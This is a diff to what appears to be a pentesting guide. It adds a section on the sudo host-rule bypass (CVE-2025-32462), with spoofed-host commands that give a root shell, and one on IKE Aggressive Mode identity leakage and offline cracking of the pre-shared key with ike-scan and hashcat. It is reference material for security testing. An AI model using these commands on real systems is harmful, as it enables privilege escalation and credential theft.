HTB Expressway

src/linux-hardening/privilege-escalation/README.md

@@ -100,6 +100,31 @@ Here is a [PoC](https://github.com/pr0v3rbs/CVE-2025-32463_chwoot) to exploit th
 
 For more information, refer to the original [vulnerability advisory](https://www.stratascale.com/resource/cve-2025-32463-sudo-chroot-elevation-of-privilege/)
 
+### Sudo host-based rules bypass (CVE-2025-32462)
+
+Sudo before 1.9.17p1 (reported affected range: **1.8.8–1.9.17**) can evaluate host-based sudoers rules using the **user-supplied hostname** from `sudo -h <host>` instead of the **real hostname**. If sudoers grants broader privileges on another host, you can **spoof** that host locally.
+
+Requirements:
+- Vulnerable sudo version
+- Host-specific sudoers rules (host is neither the current hostname nor `ALL`)
+
+Example sudoers pattern:
+
+```
+Host_Alias     SERVERS = devbox, prodbox
+Host_Alias     PROD    = prodbox
+alice          SERVERS, !PROD = NOPASSWD:ALL
+```
+
+Exploit by spoofing the allowed host:
+
+```bash
+sudo -h devbox id
+sudo -h devbox -i
+```
+
+If resolution of the spoofed name blocks, add it to `/etc/hosts` or use a hostname that already appears in logs/configs to avoid DNS lookups.
+
 #### sudo < v1.8.28
 
 From @sickrov
@@ -2157,5 +2182,6 @@ vmware-tools-service-discovery-untrusted-search-path-cve-2025-41244.md
 - [0xdf – HTB Previous (sudo terraform dev_overrides + TF_VAR symlink privesc)](https://0xdf.gitlab.io/2026/01/10/htb-previous.html)
 - [0xdf – HTB Slonik (pg_basebackup cron copy → SUID bash)](https://0xdf.gitlab.io/2026/02/12/htb-slonik.html)
 - [NVISO – You name it, VMware elevates it (CVE-2025-41244)](https://blog.nviso.eu/2025/09/29/you-name-it-vmware-elevates-it-cve-2025-41244/)
+- [0xdf – HTB: Expressway](https://0xdf.gitlab.io/2026/03/07/htb-expressway.html)
 
 {{#include ../../banners/hacktricks-training.md}}

src/network-services-pentesting/ipsec-ike-vpn-pentesting.md

@@ -215,6 +215,24 @@ pip install 'pyopenssl==17.2.0' #It is old and need this version of the library
 
 ![](<../images/image (891).png>)
 
+### Aggressive Mode identity leakage
+
+Aggressive Mode must send the **ID** early so the gateway can pick the right PSK when **multiple groups/users** exist. This means the **identity is exposed pre-auth**, unlike Main Mode where it is encrypted in later packets. You can extract it quickly:
+
+```bash
+ike-scan -A <IP>
+# Look for: ID(Type=ID_USER_FQDN, [email protected])
+```
+
+If Aggressive Mode is enabled, capture a crackable PSK handshake and crack it offline (hashcat mode `5400`):
+
+```bash
+ike-scan -A --pskcrack=handshake.txt <IP>
+hashcat -m 5400 handshake.txt /path/to/wordlist.txt
+```
+
+Recovered PSKs are often **reused** as credentials for other services (SSH, VPN client auth), so test them against exposed services.
+
 ## Capturing & cracking the hash
 
 Finally, If you have found a **valid transformation** and the **group name** and if the **aggressive mode is allowed**, then you can very easily grab the crackable hash:
@@ -326,5 +344,6 @@ Practical tips
 ## References
 
 - [YIKES: WatchGuard Fireware OS IKEv2 out-of-bounds write (CVE-2025-9242)](https://labs.watchtowr.com/yikes-watchguard-fireware-os-ikev2-out-of-bounds-write-cve-2025-9242/)
+- [0xdf – HTB: Expressway](https://0xdf.gitlab.io/2026/03/07/htb-expressway.html)
 
-{{#include ../banners/hacktricks-training.md}}
+{{#include ../banners/hacktricks-training.md}}